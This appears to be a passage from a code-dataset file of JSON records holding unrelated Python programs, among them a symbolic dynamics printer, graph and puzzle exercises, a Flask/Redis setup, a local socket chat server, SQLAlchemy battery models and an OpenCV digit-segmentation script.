self.ke_rhs_af[r] -= PorF.gen_active_force[r]\n if PorF.children == []:\n return\n else:\n for child in PorF.children:\n self.recursive_eoms(child)\n\n def output_eoms(self, filename, *args):\n \"\"\"Output the equations of motion to a file as a function which can be\n integrated by scipy.odeint\n \"\"\"\n ode_func_string = '# ' + time.asctime() + '\\n'\n ode_func_string += \"from numpy import sin, cos, tan, vectorize\\n\\n\"\n ode_func_string += \"def f(x, t, parameter_list):\\n\"\n ode_func_string += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n ode_func_string += ' ' + s[:-2] + ' = ' + 'parameter_list\\n'\n ode_func_string += ' # Unpacking the states (q\\'s and u\\'s)\\n'\n s = \"\"\n\n for q in self.q_list:\n s += str(q) + ', '\n for u in self.u_independent:\n s += str(u) + ', '\n ode_func_string += ' ' + s[:-2] + ' = ' + 'x\\n'\n\n trig_func_string = \"\"\n\n for tf in self.trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n\n ode_func_string += trig_func_string\n\n dxdt_list = \"\"\n\n if hasattr(self, 'u_dependent'):\n ode_func_string += ' # Dependent generalized speeds\\n'\n for u in self.u_dependent:\n ode_func_string += ' ' + str(u) + ' = ' +\\\n str(self.u_dependent_eqs[u].subs(self.qdot_list_dict)) + '\\n'\n\n ode_func_string += ' # Kinematic differential equations\\n'\n qdl = []\n for qd in self.qdot_list:\n if qd in self.kindiffs: qdl.append(qd)\n\n for qd in qdl:\n ode_func_string += ' ' + str(qd)[:-1] + 'p' + ' = ' + str(self.kindiffs[qd]) + '\\n'\n dxdt_list += str(qd)[:-1] + 'p, '\n\n ode_func_string += ' # Dynamic differential equations\\n'\n\n for ud in self.udot_independent:\n ode_func_string += ' ' + str(ud)[:-1] + 'p' + ' = ' + str(self.dyndiffs[ud]) + '\\n'\n dxdt_list += str(ud)[:-1] + 'p, '\n\n ode_func_string += ' ' + 'return [' + dxdt_list[:-2] + ']'\n\n qdot2u_func_string = \"\"\n qdot2u_func_string += \"def qdot2u(q, qd, parameter_list):\\n\"\n qdot2u_func_string += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'parameter_list\\n'\n qdot2u_func_string += ' # Unpacking the q\\'s and qdots\\n'\n s = \"\"\n for q in self.q_list:\n s += str(q) + ', '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'q\\n'\n s = \"\"\n for qd in qdl:\n s += str(qd)[:-1] + 'p, '\n qdot2u_func_string += ' ' + s[:-2] + ' = ' + 'qd\\n'\n\n trig_func_string = \"\"\n\n for tf in self.trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n\n qdot2u_func_string += trig_func_string\n\n dxdt_list = \"\"\n\n qdot2u_func_string += ' # Kinematic differential equations\\n'\n if hasattr(self, 'dependent_rates'):\n qdot_i = [qd.subs(self.qdot_list_dict) for qd in qdl]\n for i, u in enumerate(self.u_list):\n qdot2u_func_string += ' ' + str(u) + ' = ' +\\\n str((self.transform_matrix[i,:]*Matrix(qdot_i))[0]) + '\\n'\n dxdt_list += str(u) + ', '\n qdot2u_func_string += ' return [' + dxdt_list[:-2] + ']'\n else:\n for i, u in enumerate(self.u_list):\n qdot2u_func_string += ' ' + str(u) + ' = ' +\\\n str((self.transform_matrix[i,:]*Matrix(self.qdot_list_s))[0]) + '\\n'\n dxdt_list += str(u) + ', '\n qdot2u_func_string += ' return [' + dxdt_list[:-2] + ']'\n\n f = open(filename, 'w')\n f.write(ode_func_string + '\\n\\n' + qdot2u_func_string)\n\n if args:\n n = len(args)\n a = \"\"\n a += \"def animate(q, parameter_list):\\n\"\n a += ' # Unpacking the parameters\\n'\n s = \"\"\n for p in self.parameter_list:\n s += str(p) + ', '\n a += ' ' + s[:-2] + ' = parameter_list\\n'\n a += ' # Unpacking the coordinates\\n'\n s = \"\"\n for q in self.q_list:\n s += str(q) + ', '\n a += ' ' + s[:-2] + ' = q\\n'\n\n trig_func_set = set([])\n a_temp = \"\"\n ret_string = \"\"\n for k, arg in enumerate(args):\n ret_string += \"[\"\n if isinstance(arg, (UnitVector, Vector)):\n pos_or_axis = [arg.dot(self[i]) for i in (1,2,3)]\n for i, p in enumerate(pos_or_axis):\n nv = \"out_%d_%d\"%(k,i)\n a_temp += \" \" + nv + \" = \" + str(p) + \"\\n\"\n ret_string += nv + \", \"\n trig_terms = p.atoms(sin, cos, tan)\n if trig_terms:\n trig_func_set.update(trig_terms)\n ret_string = ret_string[:-2] + \"], \"\n else:\n raise TypeError('Optional parameters must be Vector/UniVectors')\n\n a += \" # Trigonometric functions needed\\n\"\n trig_func_string = \"\"\n for tf in trig_func_set:\n trig_func_string += ' ' + str(tf) + ' = '\n if str(tf)[0] == 's':\n trig_func_string += 'sin(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 'c':\n trig_func_string += 'cos(' + str(tf.args[0]) + ')\\n'\n if str(tf)[0] == 't':\n trig_func_string += 'tan(' + str(tf.args[0]) + ')\\n'\n a += trig_func_string\n\n a += \" # Position of Points and Axis/Angle Calculations\\n\"\n if ret_string != \"\":\n a_temp += \" return \" + ret_string[:-2]\n a += a_temp\n f.write('\\n\\n' + a)\n f.close()\n\n def define_speeds(self, eqns):\n \"\"\"Defines the generalized speeds equations, conditioning them so that\n they are more easily inverted to determined the kinematic differential\n equations.\n \"\"\"\n eqns_cond = []\n for e in eqns:\n rhs = collect(e.rhs.expand().subs(self.csqrd_dict).expand(), self.qdot_list)\n eqns_cond.append(Eq(e.lhs, rhs))\n return eqns_cond\n\n\nclass PyDyStrPrinter(StrPrinter):\n #printmethod = '_sympystr_'\n def _print_UnitVector(self, e):\n s = str(e.v['sym'])\n name = s[:-1]\n index = s[-1]\n r = \"%s%s>\" % (name, index)\n return r\n\n def _print_Vector(self, e):\n s = ''\n i = 0\n small_dot = \"*\"\n if e.dict.keys() != []:\n uv_list = e.dict.keys()\n uv_list.sort(sort_UnitVector)\n for k in uv_list:\n # Case when the scalar coefficient is 1 or -1\n if (e.dict[k] == 1) or (e.dict[k] == -1):\n # First term don't print a leading + if positive\n if i == 0:\n if e.dict[k] == 1: sign = ''\n if e.dict[k] == -1: sign = '-'\n s += sign + self.doprint(k)\n i += 1\n # All other terms put the sign and pad with spaces\n else:\n if e.dict[k] == 1: sign = '+'\n if e.dict[k] == -1: sign = '-'\n s += ' ' + sign + ' ' + self.doprint(k)\n # Case when the scalar coefficient is a Sympy expression\n else:\n # First term\n if i == 0:\n # Put parenthesis around Add terms\n if isinstance(e.dict[k], Add):\n s += ('(' + self.doprint(e.dict[k]) +\n ')' + small_dot + self.doprint(k))\n else:\n s += (self.doprint(e.dict[k]) +\n small_dot + self.doprint(k))\n i += 1\n # All subsequent terms pad with spaces and add parenthesis\n else:\n if isinstance(e.dict[k], Add):\n if e.dict[k].expand().could_extract_minus_sign():\n s += (' - (' + self.doprint(-e.dict[k].expand())\n + ')' + small_dot + self.doprint(k))\n else:\n s += (' + (' + self.doprint(e.dict[k])\n + ')' + small_dot + self.doprint(k))\n elif isinstance(e.dict[k], Mul):\n mulcoef = S(1)\n sign_counter = 0\n for arg in e.dict[k].args:\n if arg.expand().could_extract_minus_sign():\n mulcoef *= -arg.expand()\n sign_counter += 1\n else:\n mulcoef *= arg\n if sign_counter % 2 == 0:\n s += ' + ' + (self.doprint(mulcoef) + small_dot +\n self.doprint(k))\n else:\n s += ' - ' + (self.doprint(mulcoef) + small_dot +\n self.doprint(k))\n elif e.dict[k].is_negative:\n s += ' - ' + (self.doprint(-e.dict[k]) + small_dot\n + self.doprint(k))\n else:\n s += ' + ' + (self.doprint(e.dict[k]) + small_dot +\n self.doprint(k))\n return s\n else:\n return \"0>\"\n\n def _print_Function(self, e):\n \"\"\"\n Print ui(t) as ui, where is i is an index number of the generalized\n speed.\n \"\"\"\n if hasattr(e, 'is_gc'):\n return str(e.func)\n else:\n return StrPrinter().doprint(e)\n\n def _print_Symbol(self, e):\n \"\"\"\n Print ui(t) as ui, where is i is an index number of the generalized\n speed.\n \"\"\"\n if hasattr(e, 'is_gc'):\n return str(e.func)\n else:\n return StrPrinter().doprint(e)\n\n def _print_sin(self, e):\n \"\"\"\n Print sin(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n return 's' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_cos(self, e):\n \"\"\"\n Print cos(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n return 'c' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_tan(self, e):\n \"\"\"\n Print tan(qi(t)) as si, where i is any number.\n \"\"\"\n if str(e.args[0].func)[0] == 'q':\n return 't' + str(e.args[0].func)[1:]\n else:\n return StrPrinter().doprint(e)\n\n def _print_Derivative(self, expr):\n if len(expr.args) == 2:\n return str(expr.args[0].func) + \"d\"*len(expr.args[1:])\n elif len(expr.args) == 3:\n return str(expr.args[0].func) + \"d\"*len(expr.args[1:])\n else:\n return StrPrinter().doprint(expr)\n\n def _print_Dyad(self, expr):\n s = \"\"\n if expr.dict == {}:\n return \"0>>\"\n for k, v in expr.dict.items():\n if isinstance(v, Add):\n v_str = \"(\" + str(v) + \")\"\n else:\n v_str = str(v)\n if k.is_Mul:\n s += v_str + \"*\" + str(k.args[0]) + \"*\" + str(k.args[1]) + \" + \"\n elif k.is_Pow:\n s += v_str + \"*\" + str(k.args[0]) + \"*\" + str(k.args[0]) + \" + \"\n return s[:-3]\n\n #def _print_Matrix(self, expr):\n # return expr._format_str(lambda elem: elem.__str__())\n\nclass PyDyPrettyPrinter(PrettyPrinter):\n def _print_UnitVector(self, e):\n class Fake(object):\n baseline = 0\n def render(self, *args, **kwargs):\n one = \"\\xe2\\x82\\x81\"\n two = \"\\xe2\\x82\\x82\"\n three = \"\\xe2\\x82\\x83\"\n bold = \"\\033[1m\"\n reset = \"\\033[0;0m\"\n s = str(e.v['sym'])\n name = s[:-1]\n index = s[-1]\n r = \"%s%s\" % (bold, name)\n if index == \"1\":\n r += one\n elif index == \"2\":\n r += two\n elif index == \"3\":\n r += three\n r += reset\n return r\n return Fake()\n\n def _print_Vector(self, e):\n class Fake(object):\n def render(self, *args, **kwargs):\n s = ''\n i = 0\n small_dot = \"\\xC2\\xB7\"\n if e.dict.keys() != []:\n uv_list = e.dict.keys()\n uv_list.sort(sort_UnitVector)\n for k in uv_list:\n # Case when the scalar coefficient is 1 or -1\n if (e.dict[k] == 1) or (e.dict[k] == -1):\n # First term don't print a leading + if positive\n if i == 0:\n if e.dict[k] == 1: sign = ''\n if e.dict[k] == -1: sign = '-'\n s += sign + ppuv(k)\n i += 1\n # All other terms put the sign and pad with spaces\n else:\n if e.dict[k] == 1: sign = '+'\n if e.dict[k] == -1: sign = '-'\n s += ' ' + sign + ' ' + ppuv(k)\n else:\n # First term\n if i == 0:\n # Put parenthesis around Add terms\n if isinstance(e.dict[k], Add):\n s += ('(' + pretty(e.dict[k]) +\n ')' + small_dot + ppuv(k))\n else:\n s += (pretty(e.dict[k]) +\n small_dot + ppuv(k))\n i += 1\n # All other terms pad with spaces and add parenthesis\n else:\n if isinstance(e.dict[k], Add):\n s += (' + (' + pretty(e.dict[k])\n + ')' + small_dot + ppuv(k))\n elif isinstance(e.dict[k], (Mul, Pow)):\n coef = (pretty(e.dict[k]) + small_dot +\n ppuv(k))\n if coef[0] == '-':\n s += ' - ' + coef[1:]\n else:\n s += ' + ' + coef\n else:\n s += (' + ' + pretty(e.dict[k]) + small_dot +\n ppuv(k))\n\n return s\n else:\n return \"\\033[1m\" + \"0\" + \"\\033[0;0m\"\n return Fake()\n\n def _print_Derivative(self, expr):\n return str(expr.args[0].func) + \"'\"*len(expr.args[1:])\n\n def _print_Mul(self, e):\n s = ''\n i = 0\n e_ts = trigsimp(expand(trigsimp(e)))\n if e_ts.is_Mul:\n N = len(e_ts.args)\n for a in e_ts.args:\n if i == 0:\n if a == -1:\n s += '-'\n else:\n s += self.doprint(a) + '\\xC2\\xB7'\n i += 1\n elif i < N-1:\n #if a.is_Pow and a.args[1]<0:\n # s += '\\b/' + self.doprint(a.args[0]) + '\\xC2\\xB7'\n #else:\n s += self.doprint(a) + '\\xC2\\xB7'\n i += 1\n else:\n s += self.doprint(a)\n return s\n else:\n return self.doprint(e_ts)\n\n def _print_sin(self, e):\n \"\"\"\n Print sin(qi(t)) as si, where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u's' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\n def _print_cos(self, e):\n \"\"\"\n Print cos(qi(t)) as si, where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u'c' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\n def _print_tan(self, e):\n \"\"\"\n Print tan(qi(t)) as si, where i is any number.\n \"\"\"\n class Fake(object):\n def render(self, *args, **kwargs):\n if str(e.args[0].func)[0] == 'q':\n return u't' + unicode_subscript(str(e.args[0].func)[1:])\n else:\n return PrettyPrinter().doprint(e)\n return Fake()\n\nfrom functions import (sort_UnitVector, gcs, cross, dt, dot, dummy_matrix,\n animate, generate_function)\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"hazelnusse/pydy","sub_path":"pydy/pydy.py","file_name":"pydy.py","file_ext":"py","file_size_in_byte":95062,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"16216125839","text":"\"\"\"\nCreated on : 3:16 PM\nAuthor : Xue Zhang\n\"\"\"\nfrom collections import deque, Counter\n\n\ndef construct_graph(graph_nodes, graph_from, graph_to):\n graph = {}\n for node in range(1, graph_nodes + 1):\n graph[node] = []\n for j in range(len(graph_from)):\n start = graph_from[j]\n end = graph_to[j]\n graph[start].append(end)\n graph[end].append(start)\n return graph\n\n\ndef bfs_graph(start, end, graph):\n q = deque()\n visited = []\n q.append((start, 0))\n while q:\n node, step = q.popleft()\n if node == end:\n return step\n neighbors = graph[node]\n for neighbor in neighbors:\n if neighbor not in visited:\n q.append((neighbor, step+1))\n visited.append(neighbor)\n return -1\n\n\ndef findShortest(graph_nodes, graph_from, graph_to, ids, val):\n d = Counter(ids)\n if d[val] < 2:\n return -1\n graph = construct_graph(graph_nodes, graph_from, graph_to)\n color_nodes = [k + 1 for k, v in enumerate(ids) if v == val]\n n = len(color_nodes)\n steps = []\n for j in range(n):\n for k in range(j+1, n):\n step = bfs_graph(color_nodes[j], color_nodes[k], graph)\n if step != -1:\n steps.append(step)\n return min(steps) if steps else -1\n\n\nif __name__ == '__main__':\n nodes, edges = map(int, input().split())\n\n graph_start = [0] * edges\n\n graph_end = [0] * edges\n\n for i in range(edges):\n graph_start[i], graph_end[i] = map(int, input().split())\n\n colors = list(map(int, input().rstrip().split()))\n\n col = int(input())\n\n ans = findShortest(nodes, graph_start, graph_end, colors, col)\n\n print(ans)","repo_name":"xiaoxue11/hank_practice","sub_path":"Graph/02_findShortest.py","file_name":"02_findShortest.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38241724850","text":"import os\nfrom pathlib import Path\nimport random\nfrom typing import Tuple\nfrom random import randint\n\nimport sys\n\nimport unix_fonts\n\nfrom PIL import (\n Image,\n ImageDraw,\n ImageFont,\n)\n\nOUTPUT_PATH = \"output/\"\nBACKGROUND = (24, 24, 24)\nSIZE = (400, 400)\nCENTER = (SIZE[0] / 2, SIZE[1] / 2)\nMIN_AVOIDANCE = 32\n\nitems = sys.argv[1:]\n\n\ndef get_center(a: Tuple[int, int], b: Tuple[int, int]) -> Tuple[int, int]:\n return ((b[0] - a[0]) / 2 + a[0], (b[1] - a[1]) / 2 + a[1])\n\n\ndef gray(color: Tuple[int, int, int]) -> int:\n return (color[0] + color[1] + color[2]) / 3\n\n\ndef get_random_color(avoid: Tuple[int, int, int]) -> Tuple[int, int, int]:\n while True:\n col = (randint(0, 255), randint(0, 255), randint(0, 255))\n if gray(col) >= MIN_AVOIDANCE:\n return col\n\n\nif not os.path.isdir(OUTPUT_PATH):\n os.mkdir(OUTPUT_PATH)\n\n\nfor i in range(10):\n with Image.new(\"RGB\", SIZE) as image:\n image.paste(BACKGROUND, (0, 0, SIZE[0], SIZE[1]))\n\n draw = ImageDraw.Draw(image, \"RGB\")\n\n for item in items:\n font = ImageFont.truetype(\n unix_fonts.get_random_font(), random.randint(16, 32)\n )\n pos = (randint(0, SIZE[0]), randint(0, SIZE[1]))\n draw.text(\n pos, item, get_random_color(BACKGROUND), align=\"center\", font=font\n )\n\n image.save(os.path.join(OUTPUT_PATH, \"image_%d.png\" % i))\n","repo_name":"juliohq/ankify","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35676196468","text":"from flask import Flask, g\nfrom flask_mail import Mail\n\nfrom urllib.parse import urlparse\nfrom redis import Redis\nfrom redis.sentinel import Sentinel\n\napp = Flask(__name__)\nimport websmash.default_settings\napp.config.from_object(websmash.default_settings)\napp.config.from_envvar('WEBSMASH_CONFIG', silent=True)\nmail = Mail(app)\n\n\ndef get_db():\n redis_store = getattr(g, '_database', None)\n if redis_store is None:\n if 'FAKE_DB' in app.config and app.config['FAKE_DB']:\n from mockredis import mock_redis_client\n redis_store = g._database = mock_redis_client(encoding='utf-8', decode_responses=True)\n else:\n if app.config['REDIS_URL'].startswith('redis://'):\n redis_store = g._database = Redis.from_url(app.config['REDIS_URL'], encoding='utf-8',\n decode_responses=True)\n elif app.config['REDIS_URL'].startswith('sentinel://'):\n parsed_url = urlparse(app.config['REDIS_URL'])\n service = parsed_url.path.lstrip('/')\n port = 26379\n if ':' in parsed_url.netloc:\n host, str_port = parsed_url.netloc.split(':')\n port = int(str_port)\n else:\n host = parsed_url.netloc\n sentinel = Sentinel([(host, port)], socket_timeout=0.1)\n redis_store = sentinel.master_for(service, redis_class=Redis, socket_timeout=0.1)\n return redis_store\n\nimport websmash.api\nimport websmash.error_handlers\n","repo_name":"kblin/websmash","sub_path":"websmash/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"43192145304","text":"import socket\nimport threading\nimport json\n\nHOST = '127.0.0.1'\nPORT = 12345\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\nserver.listen()\n\nclients = []\nnames = []\nkeys = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n if b'disconnect' in message:\n # go to except\n assert 1 != 1\n \n elif message != b'':\n print(json.dumps({'received': message.decode()}))\n broadcast(message)\n\n except:\n index = clients.index(client)\n clients.remove(client)\n client.close()\n\n name = names[index]\n names.remove(name)\n break\n\ndef run():\n while len(clients) < 2:\n client, address = server.accept()\n clients.append(client)\n\n # asking for nickname\n client.send('> Enter your name: '.encode())\n name = client.recv(1024).strip().decode()\n names.append(name)\n\n print(json.dumps({'Address': str(address), 'Name':name, 'status':'Connected'}))\n\n # asking for pubKey\n client.send('> Enter your pubKey (\"Px, Py\"): '.encode())\n pubKey = client.recv(1024).strip().decode()\n keys.append(pubKey)\n\n print(json.dumps({'Address': str(address), 'Name':name, 'pubKey':pubKey}))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n \n clients[0].send(f\"{names[1]}'s pubKey: {keys[1]}\".encode())\n clients[1].send(f\"{names[0]}'s pubKey: {keys[0]}\".encode())\n\nif __name__ == '__main__':\n print(f'[!] Listenning to port {PORT}...')\n run()\n","repo_name":"idk-wh0am1/Secure-Chat-Room","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71890557633","text":"\"\"\"\nProvides database functionality and integration with SQLAlchemy.\n\"\"\"\n\nfrom app.extensions import db\n\n\nclass BatteryData(db.Model):\n \"\"\"\n Model representing the 'battery_data' table.\n This is the main table. The main parameters are stored here\n\n Attributes:\n id (int): The primary key of the table.\n barcode (int): The unique barcode of the battery.\n stock_params_id (int): Foreign key referencing the 'stock_parameters' table.\n real_params_id (int): Foreign key referencing the 'real_parameters' table.\n source_id (int): Foreign key referencing the 'source' table.\n photo_id (int): Foreign key referencing the 'photo' table.\n timestamp (DateTime): The timestamp of the battery data.\n \"\"\"\n\n __tablename__ = 'battery_data'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n barcode = db.Column(db.Integer, unique=True, nullable=False)\n stock_params_id = db.Column(db.ForeignKey('stock_parameters.id'))\n real_params_id = db.Column(db.ForeignKey('real_parameters.id'))\n source_id = db.Column(db.Integer, db.ForeignKey('source.id'))\n photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))\n datetime = db.Column(db.DateTime)\n\n stock_params = db.relationship('StockParameters', backref='battery_data')\n real_params = db.relationship('RealParameters', backref='battery_data')\n source = db.relationship('Source', backref='battery_data')\n photo = db.relationship('Photo', backref='battery_data')\n\n\nclass StockParameters(db.Model):\n \"\"\"\n Model representing the 'stock_parameters' table.\n Here are the stock batteries parameters\n\n Attributes:\n id (int): The primary key of the table.\n name_id (int): Foreign key referencing the 'name' table.\n capacity_id (int): Foreign key referencing the 'capacity' table.\n resistance_id (int): Foreign key referencing the 'resistance' table.\n charge_current_id (int): Foreign key referencing the 'current' table.\n max_charge_current_id (int): Foreign key referencing the 'current' table.\n discharge_current_id (int): Foreign key referencing the 'current' table.\n max_discharge_current_id (int): Foreign key referencing the 'current' table.\n \"\"\"\n\n __tablename__ = 'stock_parameters'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name_id = db.Column(db.Integer, db.ForeignKey('name.id'))\n capacity_id = db.Column(db. Integer, db.ForeignKey('capacity.id'))\n resistance_id = db.Column(db.Integer, db.ForeignKey('resistance.id'))\n charge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n max_charge_current_id = db.Column(db. Integer, db.ForeignKey('current.id'))\n discharge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n max_discharge_current_id = db.Column(db.Integer, db.ForeignKey('current.id'))\n\n\nclass RealParameters(db.Model):\n \"\"\"\n Model representing the 'real_parameters' table.\n This is a table model where the actual battery parameters are stored\n\n Attributes:\n id (int): The primary key of the table.\n name_id (int): Foreign key referencing the 'name' table.\n color_id (int): Foreign key referencing the 'color' table.\n capacity_id (int): Foreign key referencing the 'capacity' table.\n resistance_id (int): Foreign key referencing the 'resistance' table.\n voltage_id (int): Foreign key referencing the 'voltage' table.\n weight_id (int): Foreign key referencing the 'weight' table.\n \"\"\"\n\n __tablename__ = 'real_parameters'\n id = db.Column(db. Integer, primary_key=True, autoincrement=True)\n name_id = db.Column(db.Integer, db.ForeignKey('name.id'))\n color_id = db.Column(db.Integer, db.ForeignKey('color.id'), nullable=False)\n capacity_id = db.Column(db.Integer, db.ForeignKey('capacity.id'))\n resistance_id = db.Column(db.Integer, db.ForeignKey('resistance.id'), nullable=False)\n voltage_id = db.Column(db.Integer, db.ForeignKey('voltage.id'), nullable=False)\n weight_id = db.Column(db.Integer, db.ForeignKey('weight.id'))\n\n name = db.relationship('Name', backref='real_parameters')\n color = db.relationship('Color', backref='real_parameters')\n capacity = db.relationship('Capacity', backref='real_parameters')\n resistance = db.relationship('Resistance', backref='real_parameters')\n voltage = db.relationship('Voltage', backref='real_parameters')\n weight = db.relationship('Weight', backref='real_parameters')\n","repo_name":"RuslanZaliznyak/BatteryHubAPI","sub_path":"models/records.py","file_name":"records.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24674413884","text":"from ReliableCommunication import Server\n\nmyServer = Server(address=\"0.0.0.0\", port=12345, messageDataType=\"string\")\n\ndef broadcast(message):\n ''' server's callback '''\n myServer.broadcast(message)\n print(\"\".format(message))\n\ndef onConnection(client):\n print(\"{}:{} Connected\".format(client.address, client.port))\n\ndef onDisconnection(client):\n print(\"{}:{} Diconnected\".format(client.address, client.port))\n\n\nmyServer.add_onmessage_callback(broadcast)\nmyServer.add_onconnect_callback(onConnection)\nmyServer.add_onclose_callback(onDisconnection)\nmyServer.start()\n\ninput(\"\\tPRESS ANY KEY TO EXIT\\n\")\nmyServer.stop()","repo_name":"WeibelLab/Comms","sub_path":"python/Example_Server.py","file_name":"Example_Server.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34627263312","text":"import numpy as np\nimport cv2\nimport basicF as bf\n\npath = \"./img/XKw9NI.png\"\n\nimage = cv2.imread(path)\n\ngray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\nblured = cv2.bilateralFilter(gray, 6 , 220, 220)\ncv2.imshow(\"image\", image)\n# cv2.imshow(\"gray\", gray)\ncv2.imshow(\"blured\", blured)\ncv2.waitKey(0)\n \nedged = cv2.Canny(blured, 150, 180) \ncv2.imshow(\"edged\", edged) \ncv2.waitKey(0) \n \n# Fint Contours\ncontours, _ = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n \n#Sort out contours left to right by using their x cordinates\nprint(len(contours)) \n\nfiltered_contours = [c for c in contours if cv2.contourArea(c) > 2 ]\ncontours = sorted(filtered_contours, key = bf.x_cord_contour, reverse = False)\n# Create empty array to store entire number\nfull_number = []\n \n\nprint(len(contours))\n# loop over the contours\nfor c in contours:\n # compute the bounding box for the rectangle\n (x, y, w, h) = cv2.boundingRect(c) \n \n if (h > 10):\n roi = edged[y:y + h, x:x + w]\n ret, roi = cv2.threshold(roi, 127, 255,cv2.THRESH_BINARY_INV)\n squared = bf.makeSquare(roi)\n final = bf.resize_to_pixel(20, squared)\n cv2.imshow(\"final\", final)\n\n # final_array = final.reshape((1,400))\n # final_array = final_array.astype(np.float32)\n # ret, result, neighbours, dist = knn.findNearest(final_array, k=1)\n # number = str(int(float(result[0])))\n #full_number.append(number)\n # draw a rectangle around the digit, the show what the\n # digit was classified as\n\n test = image[y:y+h, x:x+w]\n cv2.imshow(\"test\", test)\n\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n #cv2.putText(image, number, (x , y + 155),\n # cv2.FONT_HERSHEY_COMPLEX, 2, (255, 0, 0), 2)\n cv2.imshow(\"image\", image)\n cv2.waitKey(0) \n \ncv2.destroyAllWindows()\n\n","repo_name":"rootsj/macro","sub_path":"stringsplit.py","file_name":"stringsplit.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17380979231","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"], \nReturn:\n\n[\n [\"ate\", \"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\nNote: All inputs will be in lower-case.\n\"\"\"\n\n\"\"\"Solution\n\"\"\"\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n diction = {}\n for string in strs:\n key = ''.join(sorted(string))\n if key not in diction:\n diction[key] = [string]\n else:\n diction[key].append(string)\n ret = []\n for key in diction.keys():\n ret.append(diction[key])\n return ret\n","repo_name":"bwang8482/LeetCode","sub_path":"Bloomberg/49_Group_Anagrams.py","file_name":"49_Group_Anagrams.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15655785513","text":"from collections import deque\n\ndef check_cup_value(cups):\n if cups[0] <= 0:\n cups.popleft()\n return cups\n\ndef fill_cups(cups, bottels, wasted_water):\n check_cup_value(cups)\n if bottels[-1] < cups[0]:\n cups[0] -= bottles[-1]\n bottels.pop()\n else:\n wasted_water += bottels[-1] - cups[0]\n cups.popleft()\n bottels.pop()\n return wasted_water\n\ndef print_result(cups, bottles, wasted_water):\n if cups:\n print(f\"Cups: {' '.join(str(el) for el in cups)}\")\n else:\n print(f\"Bottles: {' '.join([str(el) for el in reversed(bottles)])}\")\n print(f\"Wasted litters of water: {wasted_water}\")\n\ncups = deque([int(el) for el in input().split()])\nbottles = [int(el) for el in input().split()]\nwasted_water = 0\n\nwhile True:\n if not bottles or not cups:\n break\n wasted_water = fill_cups(cups, bottles, wasted_water)\n\nprint_result(cups, bottles, 